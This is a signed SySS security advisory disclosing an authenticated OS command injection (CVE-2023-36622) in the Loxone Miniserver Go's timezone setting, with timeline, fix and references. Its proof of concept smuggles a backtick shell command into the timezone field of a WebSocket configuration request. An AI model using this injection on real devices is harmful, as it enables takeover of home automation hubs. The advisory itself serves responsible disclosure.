-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-012 Product: Miniserver Go Gen.2 Manufacturer: Loxone Affected Version(s): <14.0.3.28 Tested Version(s): 14.0.3.28, 13.1.11.17 Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2023-04-21 Solution Date: 2023-05-09 Public Disclosure: 2023-06-30 CVE Reference: CVE-2023-36622 Author of Advisory: Tobias Jäger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Loxone Miniserver Go is a smart home hub. The manufacturer describes the product as follows (see [1]): "The Loxone Miniserver Go serves as central control unit for all kinds of automation tasks." Due to missing validation of user input, it is vulnerable to authenticated OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Loxone Miniserver Go is not validating user input when setting the timezone of the device. Since the timezone is set in a Linux shell context creating a symlink, the user can break out of the command and execute arbitrary OS commands. Executing a command in a shell context can be achieved by using backticks (`). The timezone can only be modified when authenticated as an administrative user. Communicating with the Loxone Miniserver Go, a websocket connection needs to be established and cryptographic parameters need to be negotiated. This is described in "Communicating with the Loxone Miniserver" (see [4]). Commands sent to the authenticated WebSocket need to be encrypted in the way described in the paper. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Follow the instructions in "Communicating with the Loxone Miniserver"(see [4]) to establish a WebSocket connection and authenticate as an administrative user. Setting the timezone to "Europe/`touch /lx/hacked;echo Vienna`" will execute the OS command to create an empty file in the folder /lx named "hacked". Setting the timezone can be achieved by encrypting and sending the following command to the WebSocket: jdev/sys/setconfiguration/?json={"ip":0,"mask":16777215,"gateway":23505088, "dns1":23505088,"dns2":134744072,"mtu":0,"port-http":80,"port-ftp":21, "port-monitor":7777,"confLocalOnly":false,"msName":"SySS","host":"hostname", "ntp":"","timezone":"Europe/`touch /lx/hacked;echo Vienna`","externHost":"", "port-extHttp":0,"port-extHttps":0,"useProxy":false}' If the attack was successful, an empty file named "hacked" should be found in the folder reachable via FTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install firmware version 14.1.5.9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-04-20: Vulnerability discovered 2023-04-21: Vulnerability reported to manufacturer 2023-05-09: Patch released by manufacturer 2023-06-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for the Loxone Miniserver Go https://www.loxone.com/dede/kb/miniserver-go/ [2] SySS Security Advisory SYSS-2023-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-012.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Communicating with the Loxone Miniserver https://www.loxone.com/dede/wp-content/uploads/sites/2/2022/06/1300_Communicating-with-the-Miniserver.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Tobias Jäger of SySS GmbH. E-Mail: tobias.jaeger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc Key ID: 0xABF0CF2F4D0220F9 Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKcIACgkQq/DPL00C IPlgIRAAmVs9+YOlJI/Zayq0N0L02MahU1DBXNEDRWUDTCyfF4egLxREPJOokxyf KbhRFTqBIhtHah1yWbY6o3A5n38fLZ0nHvdly1N3ZmTQVHTqhZtPvYTlKNVj6xQn nlWd/Z4K3aauNo4hV+sodYEwyf/T6WIn2N7/wpfLh1GjvWMPoo2ANIWaeHwjWVZD 5nzgLdrCRROCATsgwzIPLDP0DOXcFC/4Yccz8rGKCtJTVdGjEyXu8d+IrCIBStsI j/KMAmKsDfOagie5HCZWckZZ1KlEjusPUFZa2ZHe51OX4Joqhb9RLntWdTYLwn0O cMpzqPRoa2N2eLWcJyYLzGquhsew1n0iRHCzH9Hu/Q4aU7YxNhsb6oOVZEA1Pmg9 Og1EJEwjO80qq7A8FrxlKfC+ZEvNy9C66TZIQbhhZ+CDFTWMdJRAPFJJ0kDUaf7z u26WnwtbDTNroMIlSoNqpQKkRbavPcqrtRqRYCkHmunS5DsfeEQhQkpy5aNsDnYy TsXPCitoBtNBlIwUjTYHokxMZ9hkPqMyyuIylMZpB11SKsqpENtfLqJRPhKUVBdi mrKvqntconlVRwV9BZanrkxkySvhrl7s5kWVukmc5TLr7T5Rn/MuQx7ShZxU6iFn 07vhXTkPUE6os4DCWsXtgR5dAwG5T8asiqtSb+R+3Axj6nRLD0Q= =hxVd -----END PGP SIGNATURE-----